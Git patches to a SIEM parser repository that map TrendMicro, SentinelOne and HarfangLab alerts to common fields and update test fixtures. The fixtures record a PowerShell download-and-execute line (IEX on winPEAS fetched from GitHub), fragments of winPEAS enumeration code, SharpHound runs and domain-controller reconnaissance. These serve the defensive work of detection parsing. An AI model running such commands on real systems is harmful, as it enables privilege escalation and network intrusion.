-ForegroundColor Red }\\n          Write-Host -ForegroundColor red  \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n        }\\n      }    \\n      # Identity Found Check - If False, loop through and stop at root of drive\\n      if ($IdentityFound -eq $false) {\\n        if ($Target.Length -gt 3) {\\n          $Target = Split-Path $Target\\n          Start-ACLCheck $Target -ServiceName $ServiceName\\n        }\\n      }\\n    }\\n    else {\\n      # If not found, split path one level and Check again\\n      $Target = Split-Path $Target\\n      Start-ACLCheck $Target $ServiceName\\n    }\\n  }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n  Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n  $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n  if ($($services | Measure-Object).Count -lt 1) {\\n    Write-Host \\\"No unquoted service paths were found\\\";\\n  }\\n  else {\\n    $services | ForEach-Object {\\n      Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n      Write-Host Name: $_.Name\\n      Write-Host PathName: $_.PathName\\n      Write-Host StartName: $_.StartName \\n      Write-Host StartMode: $_.StartMode\\n      Write-Host Running: $_.State\\n    } \\n  }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n  Add-Type -AssemblyName PresentationCore\\n  $text = [Windows.Clipboard]::GetText()\\n  if ($text) {\\n    Write-Host \\\"\\\"\\n    if ($TimeStamp) { TimeElapsed }\\n    Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n    Write-Host $text\\n    \\n  }\\n}\\n\\nFunction Search-Excel {\\n  [cmdletbinding()]\\n  Param (\\n      [parameter(Mandatory, ValueFromPipeline)]\\n      [ValidateScript({\\n          Try {\\n              If (Test-Path -Path $_) {$True}\\n         \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "reason": "Possible Web Service Abuse",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-26T16:45:28Z",
+    "action": {
+      "properties": {
+        "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
+      }
+    },
+    "host": {
+      "id": "e930412e-e09c-454b-a508-576ba266b9d8",
+      "ip": [
+        "20.193.45.33"
+      ],
+      "name": "windows10"
+    },
+    "observer": {
+      "product": "Vision One",
+      "vendor": "TrendMicro"
+    },
+    "process": {
+      "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ",
+      "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe",
+      "hash": {
+        "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF"
+      },
+      "parent": {
+        "command_line": "C:\\Windows\\Explorer.EXE",
+        "pid": 9920
+      },
+      "pid": 5040
+    },
+    "related": {
+      "hash": [
+        "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF"
+      ],
+      "ip": [
+        "20.193.45.33"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "Possible Web Service Abuse"
+    },
+    "trendmicro": {
+      "vision_one": {
+        "alert_id": "WB-11111-22222222-00000",
+        "investigation_status": "New",
+        "severity": "medium",
+        "status": "Open"
+      }
+    },
+    "user": {
+      "domain": "windows10",
+      "id": "windows10\\jdoe",
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file

From b0a30f3d53175743ba460104746263e2d78444db Mon Sep 17 00:00:00 2001
From: vg-svitla <v.huriev@svitla.com>
Date: Thu, 28 Nov 2024 15:28:49 +0200
Subject: [PATCH 296/317] Fix review comments

---
 SentinelOne/identity/ingest/parser.yml        | 10 +++++-----
 SentinelOne/identity/tests/test_alert_1.json  | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_11.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_12.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_13.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_14.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_15.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_16.json | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_5.json  | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_6.json  | 14 ++++++--------
 SentinelOne/identity/tests/test_alert_7.json  | 14 ++++++--------
 11 files changed, 65 insertions(+), 85 deletions(-)

diff --git a/SentinelOne/identity/ingest/parser.yml b/SentinelOne/identity/ingest/parser.yml
index 79cd3ec9f..90577404d 100644
--- a/SentinelOne/identity/ingest/parser.yml
+++ b/SentinelOne/identity/ingest/parser.yml
@@ -51,11 +51,11 @@ stages:
           process.command_line: "{{json_event.message.process.cmdLine}}"
           process.parent.name: "{{json_event.message.process.parentName}}"
 
-          file.path: "{{json_event.message.process.file.path}}"
-          file.name: "{{json_event.message.process.file.path | basename}}"
-          file.hash.sha1: "{{json_event.message.process.file.sha1}}"
-          file.hash.sha256: "{{json_event.message.process.file.sha256}}"
-          file.hash.md5: "{{json_event.message.process.file.md5}}"
+          process.executable: "{{json_event.message.process.file.path}}"
+          process.name: "{{json_event.message.process.file.path | basename}}"
+          process.hash.sha1: "{{json_event.message.process.file.sha1}}"
+          process.hash.sha256: "{{json_event.message.process.file.sha256}}"
+          process.hash.md5: "{{json_event.message.process.file.md5}}"
 
           sentinelone.identity.id: "{{json_event.message.id}}"
           sentinelone.identity.name: "{{json_event.message.name}}"
diff --git a/SentinelOne/identity/tests/test_alert_1.json b/SentinelOne/identity/tests/test_alert_1.json
index 1e8b5bf2b..8d5dcf96a 100644
--- a/SentinelOne/identity/tests/test_alert_1.json
+++ b/SentinelOne/identity/tests/test_alert_1.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T05:35:09Z",
-    "file": {
-      "hash": {
-        "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
-      },
-      "name": "net1.exe",
-      "path": "c:\\windows\\system32\\net1.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain"
+      "command_line": "C:\\Windows\\system32\\net1 group \"Domain Controllers\" /domain",
+      "executable": "c:\\windows\\system32\\net1.exe",
+      "hash": {
+        "sha256": "18F76BC1F02A161EBDEDF3142273C186D05A836ADDCAAEE599194089FD59F398"
+      },
+      "name": "net1.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_11.json b/SentinelOne/identity/tests/test_alert_11.json
index a4d81025f..84d64cee6 100644
--- a/SentinelOne/identity/tests/test_alert_11.json
+++ b/SentinelOne/identity/tests/test_alert_11.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T08:45:51Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_12.json b/SentinelOne/identity/tests/test_alert_12.json
index 1618da843..3e75c9e78 100644
--- a/SentinelOne/identity/tests/test_alert_12.json
+++ b/SentinelOne/identity/tests/test_alert_12.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T08:45:51Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_13.json b/SentinelOne/identity/tests/test_alert_13.json
index a31ef954f..d94a9c18b 100644
--- a/SentinelOne/identity/tests/test_alert_13.json
+++ b/SentinelOne/identity/tests/test_alert_13.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T08:45:50Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_14.json b/SentinelOne/identity/tests/test_alert_14.json
index 7b9fc10e1..f8a4295bb 100644
--- a/SentinelOne/identity/tests/test_alert_14.json
+++ b/SentinelOne/identity/tests/test_alert_14.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T08:45:50Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_15.json b/SentinelOne/identity/tests/test_alert_15.json
index d8a7c1f8a..3d07d62a5 100644
--- a/SentinelOne/identity/tests/test_alert_15.json
+++ b/SentinelOne/identity/tests/test_alert_15.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T08:45:50Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json
index 8a5217a55..0a9dc292d 100644
--- a/SentinelOne/identity/tests/test_alert_16.json
+++ b/SentinelOne/identity/tests/test_alert_16.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T08:45:50Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_5.json b/SentinelOne/identity/tests/test_alert_5.json
index f1339df60..6e14dbe24 100644
--- a/SentinelOne/identity/tests/test_alert_5.json
+++ b/SentinelOne/identity/tests/test_alert_5.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T09:54:58Z",
-    "file": {
-      "hash": {
-        "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
-      },
-      "name": "cmd.exe",
-      "path": "c:\\windows\\system32\\cmd.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "\"C:\\Windows\\system32\\cmd.exe\""
+      "command_line": "\"C:\\Windows\\system32\\cmd.exe\"",
+      "executable": "c:\\windows\\system32\\cmd.exe",
+      "hash": {
+        "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22"
+      },
+      "name": "cmd.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json
index e43c64e20..5b987ddc2 100644
--- a/SentinelOne/identity/tests/test_alert_6.json
+++ b/SentinelOne/identity/tests/test_alert_6.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T09:45:51Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [
diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json
index d4acce26a..6fc5195cb 100644
--- a/SentinelOne/identity/tests/test_alert_7.json
+++ b/SentinelOne/identity/tests/test_alert_7.json
@@ -14,19 +14,17 @@
       "type": "info"
     },
     "@timestamp": "2024-11-22T09:45:51Z",
-    "file": {
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe",
-      "path": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe"
-    },
     "observer": {
       "product": "Singularity Identity",
       "vendor": "SentinelOne"
     },
     "process": {
-      "command_line": "Sharphound.exe"
+      "command_line": "Sharphound.exe",
+      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
+      "hash": {
+        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
+      },
+      "name": "sharphound.exe"
     },
     "related": {
       "hash": [

From e88ee2f227504e1d060cad7568d9bf5a58b31b6c Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 28 Nov 2024 16:56:30 +0100
Subject: [PATCH 297/317] fix/Harfanglab

---
 HarfangLab/harfanglab/ingest/parser.yml  | 225 ++++++++++++++++++++++-
 HarfangLab/harfanglab/tests/alert_4.json | 112 +++++++++++
 HarfangLab/harfanglab/tests/alert_5.json |  88 +++++++++
 3 files changed, 424 insertions(+), 1 deletion(-)
 create mode 100644 HarfangLab/harfanglab/tests/alert_4.json
 create mode 100644 HarfangLab/harfanglab/tests/alert_5.json

diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml
index 1376e0758..93671efde 100644
--- a/HarfangLab/harfanglab/ingest/parser.yml
+++ b/HarfangLab/harfanglab/ingest/parser.yml
@@ -29,6 +29,14 @@ pipeline:
         input_field: "{{json_event.message.event_data.TaskContent}}"
         output_field: message
 
+  - name: parse_task_info_2
+    filter: "{{json_event.message.eventlog.event_data.TaskContent != null and '<?xml' in json_event.message.event_data.TaskContent}}"
+    external:
+      name: xml.parse-xml
+      properties:
+        input_field: "{{json_event.message.eventlog.event_data.TaskContent}}"
+        output_field: message
+
   - name: parse_member_name
     filter: "{{json_event.message.event_data.get('MemberName') != None }}"
     external:
@@ -38,6 +46,15 @@ pipeline:
         output_field: message
         pattern: "([Cc][Nn]=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"
 
+  - name: parse_member_name_2
+    filter: "{{json_event.message.eventlog.event_data.get('MemberName') != None }}"
+    external:
+      name: grok.match
+      properties:
+        input_field: "{{json_event.message.eventlog.event_data.MemberName}}"
+        output_field: message
+        pattern: "([Cc][Nn]=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})"
+
   - name: agent_info
 
   - name: network_info
@@ -68,7 +85,7 @@ pipeline:
     filter: "{{json_event.message.log_type == 'investigation'}}"
 
   - name: eventlog_info
-    filter: "{{json_event.message.log_type == 'eventlog'}}"
+    filter: "{{json_event.message.log_type == 'eventlog' or json_event.message.alert_subtype == 'eventlog'}}"
 
   - name: authentication_info
     filter: "{{json_event.message.log_type == 'authentication'}}"
@@ -123,6 +140,7 @@ stages:
           event.dataset: "{{json_event.message.log_type}}"
           user.roles: "{{ json_event.message.groups | map(attribute='name') | join(',') | replace('\n', '') | replace(' ', '') }}"
           organization.id: "{{json_event.message.tenant}}"
+          url.original: "{{json_event.message.details_url_request.url}}"
 
   network_info:
     actions:
@@ -278,6 +296,8 @@ stages:
           event.provider: "{{json_event.message.source_name}}"
           event.code: "{{json_event.message.event_id|string}}"
           action.id: "{{json_event.message.event_id}}"
+
+      - set:
           user.name: "{{json_event.message.event_data.SubjectUserName}}"
           user.domain: "{{json_event.message.event_data.SubjectDomainName}}"
           user.target.name: "{{json_event.message.event_data.TargetUserName}}"
@@ -473,11 +493,214 @@ stages:
           action.properties.param9: "{{json_event.message.event_data.get('param9')}}"
           action.properties.TaskContentNew_Command: "{{parse_task_info.message.Task.Actions.Exec.Command}}"
           action.properties.TaskContentNew_Args: "{{parse_task_info.message.Task.Actions.Exec.Arguments}}"
+        filter: "{{json_event.message.event_data != null}}"
 
       - set:
           source.ip: "{{json_event.message.event_data.IpAddress}}"
         filter: "{{json_event.message.event_data.IpAddress | is_ipaddress}}"
 
+      - set:
+          user.name: "{{json_event.message.eventlog.event_data.SubjectUserName}}"
+          user.domain: "{{json_event.message.eventlog.event_data.SubjectDomainName}}"
+          user.target.name: "{{json_event.message.eventlog.event_data.TargetUserName}}"
+          user.target.domain: "{{json_event.message.eventlog.event_data.TargetDomainName}}"
+          action.properties.DeviceID: "{{json_event.message.eventlog.event_data.DeviceId}}"
+          action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.eventlog.event_data.get('AS security intelligence creation time')}}"
+          action.properties.ASsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('AS security intelligence version')}}"
+          action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.eventlog.event_data.get('AV security intelligence creation time')}}"
+          action.properties.AVsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('AV security intelligence version')}}"
+          action.properties.AccessList: "{{json_event.message.eventlog.event_data.get('AccessList')}}"
+          action.properties.AccessMask: "{{json_event.message.eventlog.event_data.get('AccessMask')}}"
+          action.properties.AccessReason: "{{json_event.message.eventlog.event_data.get('AccessReason')}}"
+          action.properties.ActionID: "{{json_event.message.eventlog.event_data.get('Action ID')}}"
+          action.properties.ActionName: "{{json_event.message.eventlog.event_data.get('Action Name')}}"
+          action.properties.AdditionalActionsID: "{{json_event.message.eventlog.event_data.get('Additional Actions ID')}}"
+          action.properties.AdditionalActionsString: "{{json_event.message.eventlog.event_data.get('Additional Actions String')}}"
+          action.properties.AuthenticationPackageName: "{{json_event.message.eventlog.event_data.get('AuthenticationPackageName')}}"
+          action.properties.BMstate: "{{json_event.message.eventlog.event_data.get('BM state')}}"
+          action.properties.CacheState: "{{json_event.message.eventlog.event_data.get('CacheState')}}"
+          action.properties.CallerProcessId: "{{json_event.message.eventlog.event_data.get('CallerProcessId')}}"
+          action.properties.CallerProcessName: "{{json_event.message.eventlog.event_data.get('CallerProcessName')}}"
+          action.properties.CategoryID: "{{json_event.message.eventlog.event_data.get('Category ID')}}"
+          action.properties.CategoryName: "{{json_event.message.eventlog.event_data.get('Category Name')}}"
+          action.properties.CertIssuerName: "{{json_event.message.eventlog.event_data.get('CertIssuerName')}}"
+          action.properties.CertSerialNumber: "{{json_event.message.eventlog.event_data.get('CertSerialNumber')}}"
+          action.properties.CertThumbprint: "{{json_event.message.eventlog.event_data.get('CertThumbprint')}}"
+          action.properties.ClientProcessId: "{{json_event.message.eventlog.event_data.get('ClientProcessId')}}"
+          action.properties.ClientProcessStartKey: "{{json_event.message.eventlog.event_data.get('ClientProcessStartKey')}}"
+          action.properties.DetectionID: "{{json_event.message.eventlog.event_data.get('Detection ID')}}"
+          action.properties.DetectionTime: "{{json_event.message.eventlog.event_data.get('Detection Time')}}"
+          action.properties.DetectionUser: "{{json_event.message.eventlog.event_data.get('Detection User')}}"
+          action.properties.Domain: "{{json_event.message.eventlog.event_data.get('Domain')}}"
+          action.properties.ElevatedToken: "{{json_event.message.eventlog.event_data.get('ElevatedToken')}}"
+          action.properties.EngineVersion: "{{json_event.message.eventlog.event_data.get('Engine Version')}}"
+          action.properties.Engineup-to-date: "{{json_event.message.eventlog.event_data.get('Engine up-to-date')}}"
+          action.properties.Engineversion: "{{json_event.message.eventlog.event_data.get('Engine version')}}"
+          action.properties.ErrorCode: "{{json_event.message.eventlog.event_data.get('Error Code')}}"
+          action.properties.ErrorDescription: "{{json_event.message.eventlog.event_data.get('Error Description')}}"
+          action.properties.ExecutionID: "{{json_event.message.eventlog.event_data.get('Execution ID')}}"
+          action.properties.ExecutionName: "{{json_event.message.eventlog.event_data.get('Execution Name')}}"
+          action.properties.FQDN: "{{json_event.message.eventlog.event_data.get('FQDN')}}"
+          action.properties.FWLink: "{{json_event.message.eventlog.event_data.get('FWLink')}}"
+          action.properties.FailureReason: "{{json_event.message.eventlog.event_data.get('FailureReason')}}"
+          action.properties.FileNameBuffer: "{{json_event.message.eventlog.event_data.get('FileNameBuffer')}}"
+          action.properties.FileNameLength: "{{json_event.message.eventlog.event_data.get('FileNameLength')}}"
+          action.properties.Flags: "{{json_event.message.eventlog.event_data.get('Flags')}}"
+          action.properties.Hash: "{{json_event.message.eventlog.event_data.get('Hash')}}"
+          action.properties.HashSize: "{{json_event.message.eventlog.event_data.get('Hash Size')}}"
+          action.properties.IOAVstate: "{{json_event.message.eventlog.event_data.get('IOAV state')}}"
+          action.properties.ImpersonationLevel: "{{json_event.message.eventlog.event_data.get('ImpersonationLevel')}}"
+          action.properties.IpAddress: "{{json_event.message.eventlog.event_data.get('IpAddress')}}"
+          action.properties.IpPort: "{{json_event.message.eventlog.event_data.get('IpPort')}}"
+          action.properties.IssuerName: "{{json_event.message.eventlog.event_data.get('IssuerName')}}"
+          action.properties.IssuerNameLength: "{{json_event.message.eventlog.event_data.get('IssuerNameLength')}}"
+          action.properties.IssuerTBSHash: "{{json_event.message.eventlog.event_data.get('IssuerTBSHash')}}"
+          action.properties.IssuerTBSHashSize: "{{json_event.message.eventlog.event_data.get('IssuerTBSHashSize')}}"
+          action.properties.KeyLength: "{{json_event.message.eventlog.event_data.get('KeyLength')}}"
+          action.properties.LastASsecurityintelligenceage: "{{json_event.message.eventlog.event_data.get('Last AS security intelligence age')}}"
+          action.properties.LastAVsecurityintelligenceage: "{{json_event.message.eventlog.event_data.get('Last AV security intelligence age')}}"
+          action.properties.Lastfullscanage: "{{json_event.message.eventlog.event_data.get('Last full scan age')}}"
+          action.properties.Lastfullscanendtime: "{{json_event.message.eventlog.event_data.get('Last full scan end time')}}"
+          action.properties.Lastfullscansource: "{{json_event.message.eventlog.event_data.get('Last full scan source')}}"
+          action.properties.Lastfullscanstarttime: "{{json_event.message.eventlog.event_data.get('Last full scan start time')}}"
+          action.properties.Lastquickscanage: "{{json_event.message.eventlog.event_data.get('Last quick scan age')}}"
+          action.properties.Lastquickscanendtime: "{{json_event.message.eventlog.event_data.get('Last quick scan end time')}}"
+          action.properties.Lastquickscansource: "{{json_event.message.eventlog.event_data.get('Last quick scan source')}}"
+          action.properties.Lastquickscanstarttime: "{{json_event.message.eventlog.event_data.get('Last quick scan start time')}}"
+          action.properties.Latestengineversion: "{{json_event.message.eventlog.event_data.get('Latest engine version')}}"
+          action.properties.Latestplatformversion: "{{json_event.message.eventlog.event_data.get('Latest platform version')}}"
+          action.properties.LmPackageName: "{{json_event.message.eventlog.event_data.get('LmPackageName')}}"
+          action.properties.LogonGuid: "{{json_event.message.eventlog.event_data.get('LogonGuid')}}"
+          action.properties.LogonProcessName: "{{json_event.message.eventlog.event_data.get('LogonProcessName')}}"
+          action.properties.LogonType: "{{json_event.message.eventlog.event_data.get('LogonType')}}"
+          action.properties.MemberName: "{{(json_event.message.eventlog.event_data.get('MemberName').split('\\\\')[-1]) or (parse_member_name_2.message.first_name + ' ' + parse_member_name_2.message.last_name)}}"
+          action.properties.CompatibleIds: "{{json_event.message.eventlog.event_data.get('CompatibleIds')}}"
+          action.properties.NRIengineversion: "{{json_event.message.eventlog.event_data.get('NRI engine version')}}"
+          action.properties.NRIsecurityintelligenceversion: "{{json_event.message.eventlog.event_data.get('NRI security intelligence version')}}"
+          action.properties.NotValidAfter: "{{json_event.message.eventlog.event_data.get('NotValidAfter')}}"
+          action.properties.NotValidBefore: "{{json_event.message.eventlog.event_data.get('NotValidBefore')}}"
+          action.properties.OAstate: "{{json_event.message.eventlog.event_data.get('OA state')}}"
+          action.properties.ObjectType: "{{json_event.message.eventlog.event_data.get('ObjectType')}}"
